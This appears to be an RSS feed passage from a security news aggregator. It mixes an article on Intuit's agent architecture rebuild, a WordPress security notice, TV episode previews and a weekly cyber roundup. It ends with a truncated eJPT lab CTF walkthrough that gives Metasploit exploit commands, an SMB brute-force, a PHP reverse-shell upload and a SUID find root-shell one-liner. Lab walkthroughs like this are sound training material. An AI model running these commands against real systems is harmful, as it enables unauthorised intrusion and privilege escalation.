<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Intuit was an<a href="https://venturebeat.com/ai/how-intuit-plans-to-use-agentic-ai-to-automate-complex-business-tasks"> early pioneer</a> in the usage of agentic AI, but its path to success has hardly been a straight line.</p><p>At<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a>, Intuit VP of AI Nhung Ho described how the company rebuilt its agent architecture twice in the span of about four months, first moving from a fleet of specialist agents to a central orchestration layer, then abandoning that layer for a skills and tools based system once the orchestrator itself started failing under its own complexity. The full second rebuild took 60 days, with a first working version in under 20.</p><p>The failure mode that forced the second rewrite was specific. Agents in the orchestrated system passed results to each other in natural language, and each handoff lost context the next agent needed to act correctly. </p><p>"If you have 10 agents and they all are passing to each other, every time that pass happens, error compounds," Ho said.</p><h2>Why the orchestration layer broke down</h2><p>Ho said the original push toward specialist agents came from a straightforward customer complaint. A fleet of capable agents is still something a customer has to manage, deciding which agent to use for which task. Intuit's answer was a system that could take a task and route it internally, without asking the customer to pick an agent themselves.</p><p>That orchestration layer held up for about three months, which Ho described only half joking as roughly a year in the compressed timeline of agent development in 2026.</p><p>It broke for a structural reason rather than a capacity one. Passing outcomes between agents in natural language meant each downstream agent had to infer how the upstream agent reached its conclusion, and that inference degraded with each additional hop. A ten agent chain did not fail occasionally, it compounded errors by design.</p><p>That diagnosis is what sent Intuit back to a skills and tools architecture.</p><h2>The 60-day rebuild, and what it took to get engineering buy-in</h2><p>Rebuilding a production agent system in 60 days required more than an architectural decision. Ho said the harder problem was internal, convincing both leadership and the engineers who had built the original agents that scrapping recent work was the right call.</p><p>The pitch to leadership relied on evidence rather than argument. Ho's team built a demo of the new architecture using real customer queries pulled from production, then showed it performing better than the existing system on the same tasks. </p><p>"The best proof, at least my belief, is what are customers trying to do? And whatever system you build needs to address those problems," Ho said.</p><p>Winning over engineering required a different case. Hundreds of engineers outside Ho's core team had built the specialist agents being retired, and the ask was to take their agents apart into individual skills and tools instead. </p><p>Ho said the motivating argument was scale. A standalone agent solved one narrow problem, while a shared skill or tool built into the new architecture could serve every customer who touched that part of the product. That shift also changed what partner teams were responsible for day to day, moving their focus from building agents to running evals, since evals became the only way to measure whether the new architecture was actually working.</p><h2>Bringing a human into the loop, and feedback at a different scale</h2><p>The clearest customer facing result of the rebuild is a feature that lets a live agent conversation pull in a human — though it's currently in early testing, live to about 1% of Intuit's customer base. "We're going to be scaling it up in the next few weeks," she said.</p><p>Ho said a customer can bring in an Intuit product support person mid conversation, or their own accountant, or one of Intuit's own bookkeepers, and that person joins with the full context of what the agent has already done.</p><p>Ho drew a direct contrast with how most AI chat products handle the same situation. A general purpose assistant answering a tax question typically ends with a disclaimer to consult a professional. Intuit's system is built to connect the customer to that professional directly, inside the same conversation.</p><p>That human handoff sits alongside a permissions model built for financial data specifically. Every action an agent takes on a customer's financial data requires explicit permission first, though Ho said that requirement can ease over time as customers build trust in the system. Intuit keeps an audit log of everything an agent does that can be reversed if needed.</p><h2>Feedback in the agentic AI era</h2><p>The rebuild also changed how Intuit gathers and uses feedback, a shift Ho said is qualitatively different from what came before. </p><p>"Feedback in the past used to be very, very sparse, and it was also very bimodal," Ho said. "Either they loved it or they hated it, and usually it tends towards the negative."</p><p>In a chat based system, every conversation functions as feedback, which Ho said moved the company from roughly 0.3% of customers ever giving explicit feedback to something close to 100%.</p><p>Ho said she has returned to writing code herself specifically to build models that analyze that feedback volume systematically, looking for where the system is falling short at a scale no manual review process could keep up with.</p><p>That volume comes with a tone most product teams aren't used to hearing directly. Customers tell the agent exactly where it failed, in plain terms.</p><p>"They straight up tell you, 'You suck. I hate this. This is not right,'" Ho said. "But they're also willing to give the systems grace and correct it as well, and so the onus is on all of us to harvest this new piece of feedback and type of feedback, and actually improve the system."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress 7.0.2 Release]]></title>
<description><![CDATA[WordPress 7.0.2 is now available. The 7.0.2 security release addresses one critical and one high severity security issue. Because this is a security release, it is recommended that you update your sites immediately. Due to the severity, the WordPress.org team have enabled forced updates via the a...]]></description>
<link>https://tsecurity.de/de/3676847/it-security-nachrichten/wordpress-702-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676847/it-security-nachrichten/wordpress-702-release/</guid>
<pubDate>Fri, 17 Jul 2026 20:53:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress 7.0.2 is now available. The 7.0.2 security release addresses one critical and one high severity security issue. Because this is a security release, it is recommended that you update your sites immediately. Due to the severity, the WordPress.org team have enabled forced updates via the auto-update system for sites running affected versions. To manually […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 4 Release Date and What to Expect Next]]></title>
<description><![CDATA[Silo Season 3 Episode 4 will release on Friday, July 24, 2026, on Apple TV. The upcoming chapter will continue Juliette Nichols’ dangerous search for Lukas Kyle while Camille Sims faces growing pressure from the Algorithm.



Apple confirmed that Silo Season 3 contains 10 episodes, with one new e...]]></description>
<link>https://tsecurity.de/de/3676830/ios-mac-os/silo-season-3-episode-4-release-date-and-what-to-expect-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676830/ios-mac-os/silo-season-3-episode-4-release-date-and-what-to-expect-next/</guid>
<pubDate>Fri, 17 Jul 2026 20:40:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 4 will release on Friday, July 24, 2026, on Apple TV. The upcoming chapter will continue Juliette Nichols’ dangerous search for Lukas Kyle while Camille Sims faces growing pressure from the Algorithm.



Apple confirmed that Silo Season 3 contains 10 episodes, with one new episode arriving every Friday. The season began on July 3 and will conclude on September 4, 2026.



Silo Season 3 Episode 4 release details




Release date: Friday, July 24, 2026



Streaming platform: Apple TV



Season: 3



Episode: 4



Genre: Science fiction, mystery and dystopian drama



Total Season 3 episodes: 10



Season finale date: September 4, 2026



Main star: Rebecca Ferguson as Juliette Nichols




Apple has not publicly revealed the official Episode 4 title or synopsis at the time of writing. However, the events of Episode 3 establish several major storylines that the next chapter can continue.



What happened in Silo Season 3 Episode 3?



Spoilers ahead for Silo Season 3 Episode 3.



Episode 3 places Camille Sims in control of IT after the Algorithm decides that her ability to manipulate people makes her suitable for the role. She learns that the system wants the memories of all 9,913 Silo residents erased unless she can stop the threat developing inside the structure.



Meanwhile, Juliette enters the mines with Knox as she continues looking for Lukas Kyle. Camille releases poison gas in an effort to force Lukas out, leaving Juliette close to death. Lukas eventually rescues her before a group of Outsiders takes him away.



The Algorithm later sees Juliette’s possible death as a way to calm the population. Camille reluctantly accepts an order to have her killed, placing Juliette in immediate danger heading into Episode 4.



What to expect from Silo Season 3 Episode 4



Episode 4 will likely focus on Camille’s assassination order and whether she follows the Algorithm’s instructions. Although Camille has repeatedly protected the Silo’s system, her decisions in Episode 3 show that she still questions its extreme methods.



Juliette may also begin investigating Lukas’ disappearance after recovering from the gas attack. The Outsiders who rescued Lukas appear to know more about the Silo, its surveillance system and the safeguard protocol. Finding them could give Juliette the information she needs to challenge the Algorithm.



Sheriff Paul Billings is also investigating a murder connected to the mines. His discovery that Kat Billings is an Outsider adds another personal conflict, especially as tensions between Silo residents and the hidden group continue to rise.



The “Before Times” storyline should move forward as Congressman Daniel Keene and journalist Helen Drew investigate the mysterious recording and the conspiracy surrounding the pilots. Season 3 uses two timelines to explain how the underground silos were created more than 350 years earlier.



How previous seasons led to Season 3



The first two seasons followed Juliette as she uncovered the truth about Silo 18 and learned that other silos existed nearby. Season 2 ended with Juliette returning home and becoming trapped with Bernard Holland as cleansing fire filled the airlock.



Season 3 begins with Juliette alive but suffering from memory loss. She now serves as mayor while Robert and Camille Sims use her condition to control the Silo. At the same time, the historical storyline explores the decisions that created the underground system and the catastrophe that forced humanity below the surface.



Silo Season 3 Episode 4 arrives on Apple TV on July 24. Will Camille carry out the Algorithm’s order, or will she help Juliette uncover the truth? Let us know what you think will happen in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Agent Kim Reactivated Episode 7 Ending Explained: Kim Loses Control Again]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 7 turns Kim Do-hyeon’s long-awaited reunion with Min-ji into another dangerous fight for survival. Kim finally reaches his daughter, but getting her home safely proves far more difficult than finding her.



Spoiler warning: This article contains major spoilers for A...]]></description>
<link>https://tsecurity.de/de/3676792/ios-mac-os/agent-kim-reactivated-episode-7-ending-explained-kim-loses-control-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676792/ios-mac-os/agent-kim-reactivated-episode-7-ending-explained-kim-loses-control-again/</guid>
<pubDate>Fri, 17 Jul 2026 20:10:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 7 turns Kim Do-hyeon’s long-awaited reunion with Min-ji into another dangerous fight for survival. Kim finally reaches his daughter, but getting her home safely proves far more difficult than finding her.



Spoiler warning: This article contains major spoilers for Agent Kim Reactivated Episode 7 and earlier episodes.




Release date: July 17, 2026



Streaming platform: Netflix



Korean network: SBS



Airtime: Fridays and Saturdays at 9:50 p.m. KST



Genre: Action, crime, thriller and comedy




The Korean action drama premiered on June 26 and will continue until July 25. Episode 7 brings the story into its final stretch, with only three episodes remaining after this chapter.



Kim’s rescue mission falls apart



Episode 6 ended with Kim finding Min-ji after tracking down the people involved in her disappearance. His quiet promise that they would finally go home gave the pair a brief emotional reunion, but the danger surrounding them had not disappeared.



In Episode 7, Kim attempts to move Min-ji away from the area while Seong Han-su and Park Jin-cheol help protect them. Their escape quickly comes under attack, forcing the three fathers to fight through another group of armed men.



Min-ji also shows that she is more resourceful than her captors expect. Instead of waiting helplessly for someone to save her, she watches her surroundings, looks for an opening and tries to escape. Her actions reflect the courage and survival instincts she inherited from her father.



However, Kim’s rescue mission takes a darker turn when the attack separates him from Min-ji again. The brief reunion leaves him even more determined to destroy everyone involved in placing her life at risk.



Kim confronts Joo Kang-chan



Joo Kang-chan remains at the centre of the conflict. His influence helped turn Min-ji’s school dispute into a violent kidnapping case, while his connections allowed those responsible to avoid immediate consequences.



Kim now understands that simply rescuing Min-ji will not end the threat. As long as Kang-chan and his organisation remain active, his daughter will never be safe.



The confrontation pushes Kim closer to the ruthless operative once known as Code 66. He stops reacting like an ordinary father trapped in a dangerous situation and begins approaching the conflict as a former special agent completing a mission.



Kim’s decision to eliminate the threat also raises a difficult question. Even if he saves Min-ji, she has now seen the violent identity he spent years hiding from her.



Kim’s past becomes the next major threat



Earlier episodes revealed that Kim left his dangerous career behind to raise Min-ji and live as an ordinary bank employee. Her disappearance forced him to use the combat skills, contacts and instincts that he had tried to bury.



Episode 7 makes it clear that his past will continue following him. The next chapter appears ready to explore Code 66 more deeply as another figure from Kim’s former life enters the conflict. The Episode 8 preview directly calls him by his old codename, suggesting that rescuing Min-ji has opened the door to an even larger operation.



With the final episodes approaching, Kim must protect his daughter while facing the consequences of becoming Code 66 again. What do you think will happen when Min-ji learns the full truth about her father? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 4 Release Date, Time, and What to Expect]]></title>
<description><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a ...]]></description>
<link>https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675994/ios-mac-os/silo-season-3-episode-4-release-date-time-and-what-to-expect/</guid>
<pubDate>Fri, 17 Jul 2026 14:10:37 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 4 will arrive on Apple TV on Friday, July 24, 2026. The next chapter will continue Juliette Nichols’ fight to recover her memories while the Before Times storyline reveals more about the events that led to the creation of the silos.



Season 3 began on July 3 and follows a weekly Friday release schedule. The ten-episode season will run through September 4, 2026.



Silo Season 3 Episode 4 release details




Release date: Friday, July 24, 2026



Release time: 12 a.m. PT and 3 a.m. ET



India release time: Around 12:30 p.m. IST



Streaming platform: Apple TV



Genre: Science fiction, dystopian drama and mystery



Expected duration: Around 45 to 60 minutes



Season episode count: 10 episodes



Season finale: September 4, 2026



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Alexandria Riley, Shane McRae and Remmie Milner




Ashley Zukerman, Jessica Henwick, Laura Innes, Jessica Brown Findlay, Morven Christie, Reed Birney, Matt Craven and Colin Hanks are among the major additions to the Season 3 cast. Steve Zahn also returns after playing Solo in Season 2.



What happened before Episode 4?



Spoilers ahead for Silo Season 3 Episodes 1 to 3.



Season 3 follows two connected timelines. Inside Silo 18, Juliette has returned after surviving her journey outside, but her damaged memories have left her vulnerable. Camille Sims and Nurse Amy have been using memory-altering drugs as part of a wider attempt to control her and weaken any resistance inside the silo.



Juliette gradually learns that other residents have also lost parts of their memories. Patrick Kennedy tells her about the drugs being used to make people forget, while Juliette continues searching for Lukas Kyle and the truth hidden from her.



Meanwhile, the Before Times storyline follows journalist Helen Drew and pilot Charlotte Keene. Helen investigates secret memory-erasure experiments connected to Dr. Crnkovich, while Charlotte begins recovering memories of a suspicious military operation. Their story appears closely tied to the political crisis and possible attack that eventually forced humanity underground.



What to expect from Silo Season 3 Episode 4



Episode 4 will likely push Juliette closer to discovering who altered her memories and why the Algorithm considers her dangerous. Her growing resistance to the medication also puts Camille, Sims and Nurse Amy under pressure, since they can no longer assume that Juliette will remain confused or obedient.



Patrick’s information about the forgetfulness drugs may help Juliette identify more people who were secretly controlled. Lukas could also return to the main storyline, especially because his knowledge of the Legacy and Salvador Quinn’s message makes him important to understanding the silos.



The Before Times plot should continue exploring Helen’s investigation and Charlotte’s recovered memories. Charlotte’s mission may reveal who planned the disaster, what the strange substance was and whether powerful officials helped create the conditions that led to the silo project.



As both timelines develop, Episode 4 should make the connection between Juliette’s present-day struggle and the original architects of the silo system much clearer.



Silo Season 3 Episode 4 streams on Apple TV on July 24. What do you think Juliette will remember next, and how deeply is Camille involved in the plan to control Silo 18? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: TikTok Age Verification Probe, Healthcare Data Breach, Qantas Ruling, and Major Cyberattacks]]></title>
<description><![CDATA[This week’s cybersecurity roundup highlights growing concerns around online child safety, healthcare data protection, supply chain risks, and cyber threats affecting organizations worldwide. From regulatory scrutiny of digital platforms to large-scale vulnerabilities and operational disruptions, ...]]></description>
<link>https://tsecurity.de/de/3675935/it-security-nachrichten/the-cyber-express-weekly-roundup-tiktok-age-verification-probe-healthcare-data-breach-qantas-ruling-and-major-cyberattacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675935/it-security-nachrichten/the-cyber-express-weekly-roundup-tiktok-age-verification-probe-healthcare-data-breach-qantas-ruling-and-major-cyberattacks/</guid>
<pubDate>Fri, 17 Jul 2026 13:54:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1101" height="614" src="https://thecyberexpress.com/wp-content/uploads/weekly-round.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="weekly round" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/weekly-round.webp 1101w, https://thecyberexpress.com/wp-content/uploads/weekly-round-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/weekly-round-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/weekly-round-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/weekly-round-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/weekly-round-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/weekly-round-750x418.webp 750w, https://thecyberexpress.com/wp-content/uploads/weekly-round.webp 1101w, https://thecyberexpress.com/wp-content/uploads/weekly-round-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/weekly-round-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/weekly-round-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/weekly-round-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/weekly-round-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/weekly-round-750x418.webp 750w" sizes="(max-width: 1101px) 100vw, 1101px" title="The Cyber Express Weekly Roundup: TikTok Age Verification Probe, Healthcare Data Breach, Qantas Ruling, and Major Cyberattacks 1"></p><span data-contrast="auto">This week’s cybersecurity roundup highlights growing concerns around online child safety, healthcare data protection, supply chain risks, and cyber threats affecting organizations worldwide. From regulatory scrutiny of digital platforms to large-scale vulnerabilities and operational disruptions, recent incidents show how cyber risks continue expanding across industries.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The key theme in this weekly roundup is the increasing pressure on organizations to strengthen security, improve <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29030">data</a> protection measures, and adapt to rapidly changing threat environments. Regulators, businesses, and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29026">cybersecurity</a> teams are facing challenges ranging from social engineering attacks and malware incidents to vulnerabilities affecting widely used enterprise technologies.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<h3 aria-level="3"><b><span data-contrast="none">UK Investigates TikTok Age Verification Compliance</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The UK communications regulator Ofcom has launched an investigation into TikTok’s age verification system, examining whether the platform is meeting its child safety obligations under the Online Safety Act. The probe comes as the UK government prepares stricter social media restrictions for users under 16, with enhanced age assurance requirements expected to take effect by Spring 2027. </span><a href="https://thecyberexpress.com/tiktok-age-verification-probe-launched-by-uk/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Partnered Health Cyberattack Exposes Australian Patient Data</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Healthcare provider Partnered Health has suffered a <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29031">cyberattack</a> that exposed sensitive patient information from 21 clinics across Australia. The compromised data reportedly includes personal details, Medicare information, health insurance records, and medical documents. Authorities and the company continue investigating the incident to determine the full scope of the breach and whether additional information was affected. </span><a href="https://thecyberexpress.com/partnered-health-cyberattack/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Qantas Data Breach Cleared After Privacy Review</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Australia’s privacy regulator has concluded its review of the 2025 Qantas <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-a-data-breach/" target="_blank" rel="noopener" title="data breach" data-wpil-keyword-link="linked" data-wpil-monitor-id="29029">data breach</a>, finding no evidence that the airline failed to take reasonable measures to protect customer information. The incident affected approximately 5.67 million records after attackers used <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="29032">social engineering</a> techniques to compromise a contact center employee. </span><a href="https://thecyberexpress.com/qantas-did-everything-right-yet-got-breached/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Nichirei Cyberattack Disrupts KFC Japan Supply Chain</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Japanese frozen food and logistics company Nichirei experienced a cyberattack that disrupted deliveries to KFC Japan after unauthorized access impacted its systems. The <a href="https://www.nichirei.co.jp/sites/default/files/inline-images/english/ir/pdf_file/news/20260716_e.pdf" target="_blank" rel="nofollow noopener">company isolated</a> affected infrastructure, suspended certain logistics operations, and began recovery efforts with external cybersecurity specialists while investigating the incident. </span><a href="https://thecyberexpress.com/nichirei-cyberattack-disrupts-supply-chain/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Microsoft Patch Tuesday Addresses 622 Security Flaws</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Microsoft’s July 2026 Patch Tuesday update fixed 622 <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29033">vulnerabilities</a> across its product ecosystem, making it the company’s largest security release to date. The update included patches for two actively exploited zero-day vulnerabilities, CVE-2026-56164 and CVE-2026-56155, affecting Microsoft SharePoint Server and Active Directory Federation Services. </span><a href="https://thecyberexpress.com/microsoft-patch-tuesday-july-2026-622-flaws/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Nihon Kotsu Cyberattack Disrupts Japan Taxi Operations</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Japan’s largest taxi operator, Nihon Kotsu, suffered a malware-related cyberattack that forced the company to shut down parts of its IT infrastructure. The incident, detected on July 11, 2026, affected taxi dispatch services and internal systems as the company worked to contain the attack and investigate potential data exposure. </span><a href="https://thecyberexpress.com/nihon-kotsu-cyberattack/"><span data-contrast="none">Read more…</span></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<span data-contrast="auto">This week’s cybersecurity developments highlight the growing complexity of modern <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29027">cyber</a> threats, with attacks and security challenges affecting technology platforms, healthcare providers, logistics companies, transportation services, and enterprise software environments. From regulatory action on digital safety to actively exploited vulnerabilities and supply chain disruptions, organizations are facing increased pressure to strengthen resilience and respond faster to emerging <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risks" data-wpil-keyword-link="linked" data-wpil-monitor-id="29028">risks</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 3 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering ProFTPD mod_copy exploitation, local service banner grabbing, SMB brute-force with webshell upload, and SUID binary privilege escalation to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 3 from INE’s eJPT path. Two Linux targets this ...]]></description>
<link>https://tsecurity.de/de/3675299/hacking/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675299/hacking/host-network-penetration-testing-exploitation-ctf-3-ejpt-ine/</guid>
<pubDate>Fri, 17 Jul 2026 09:09:39 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering ProFTPD mod_copy exploitation, local service banner grabbing, SMB brute-force with webshell upload, and SUID binary privilege escalation to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*87U4fyepLVSRM9bGtqmnbQ.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 3 from INE’s eJPT path. Two Linux targets this time — one running a vulnerable FTP service with a hidden local service, and another with a misconfigured Samba share that opens a path all the way to root.</p><p>So, let’s dive in.</p><h3>Q. A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.</h3><p>As usual, I started with an Nmap scan:</p><pre>nmap -sV -sC target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0esbkOoRoB_2RtbiA5RC5A.png"></figure><p>Port 21 was open running <strong>ProFTPD 1.3.5</strong>, alongside port 80 (Apache). I searched for known exploits:</p><pre>searchsploit ProFTPD 1.3.5</pre><p>A Metasploit module came up immediately — exploit/unix/ftp/proftpd_modcopy_exec, which abuses the mod_copy module to execute arbitrary commands via FTP. I loaded it up and set the site path to /var/www/html — the default Apache web root on Linux — since the exploit writes a payload there to be triggered over HTTP:</p><pre>use exploit/unix/ftp/proftpd_modcopy_exec<br>set rhosts target1.ine.local<br>set sitepath /var/www/html<br>set lhost eth1<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K2zB3Wo4YD4eFRiTKACYgA.png"></figure><p>A shell session opened. I upgraded it to Meterpreter:</p><pre>sessions -u 1</pre><p>Then listed the root directory:</p><pre>meterpreter &gt; ls /</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*iCgXij4caoCW23EhRWepQg.png"></figure><p>flag1.txt was sitting right there in the root.</p><h3>Q. Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.</h3><p>I read the flag file:</p><pre>meterpreter &gt; cat /flag1.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/674/1*v3_wdlMA0-lFjjny7xr6og.png"></figure><p>Along with the flag value, it contained a hint: <em>“Remember, the magical word is ‘letmein’”</em>.</p><p>The question mentioned a local network service, so I checked what was listening internally:</p><pre>meterpreter &gt; netstat</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YTpn4VegwuC0aysg0ZpMQg.png"></figure><p>Port <strong>8888</strong> was open on 127.0.0.1 — not exposed externally, only reachable from inside the machine. I dropped into a shell and connected to it with netcat:</p><pre>meterpreter &gt; shell<br>nc -nv 127.0.0.1 8888</pre><p>It prompted for a secret passphrase. I entered letmein — and it returned Flag 2 directly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-KgH6U6iOXZPUsuKXWyhwQ.png"></figure><h3>Q. A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?</h3><p>Fresh Nmap scan on the second target:</p><pre>nmap -sV -sC target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d4jYtDskVIXurPFFNQhNwg.png"></figure><p>Ports 80, 139, and 445 were open — Samba running on a Linux target. The HTTP title read <em>“Can you Pwn me?”</em> — a clear invitation. I brute-forced SMB credentials across both users and passwords:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target2.ine.local<br>set user_file /usr/share/wordlists/metasploit/common_users.txt<br>set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt<br>set createsession true<br>set verbose false<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PKSOkZ__Hrp-fpVWGLqkqg.png"></figure><p>Six accounts came back with valid credentials, all with the same password. Multiple SMB sessions opened automatically. I used the administrator session:</p><pre>sessions 8<br>shares<br>shares -i site-uploads<br>ls</pre><p>The site-uploads share was accessible and writable. The name itself was the giveaway — this share was almost certainly mapped to the web root. I uploaded a PHP reverse shell set to my IP:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*i_lZOr4nmUqskbA6wbXWoA.png"></figure><p>Set up a multi/handler listener, then triggered the shell by navigating to:</p><pre>http://target2.ine.local/site-uploads/shell.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Lh-O23_XLKJK5Dze3TSp6w.png"></figure><p>Shell came back. Listing the root / directory showed flag3.txt right there.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/947/1*vC0LfSf5aZCHXWm74C4cCA.png"></figure><h3>Q. Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?</h3><p>Still in the shell session, I upgraded to Meterpreter first:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Meqrnjx574wtEQjF1akclQ.png"></figure><p>Then dropped into a shell and searched for SUID binaries — files that run with the owner’s privileges regardless of who executes them:</p><pre>find / -type f -perm -4000 2&gt;/dev/null</pre><p>/usr/bin/find itself had the SUID bit set and was owned by root. This is a classic privilege escalation vector — if find runs as root and can execute commands, any user can spawn a root shell through it.</p><p>I checked <a href="https://gtfobins.org/">GTFOBins</a> — a community database of Unix binaries that can be abused to bypass local security restrictions — for the correct syntax:</p><pre>find . -exec /bin/sh -p \; 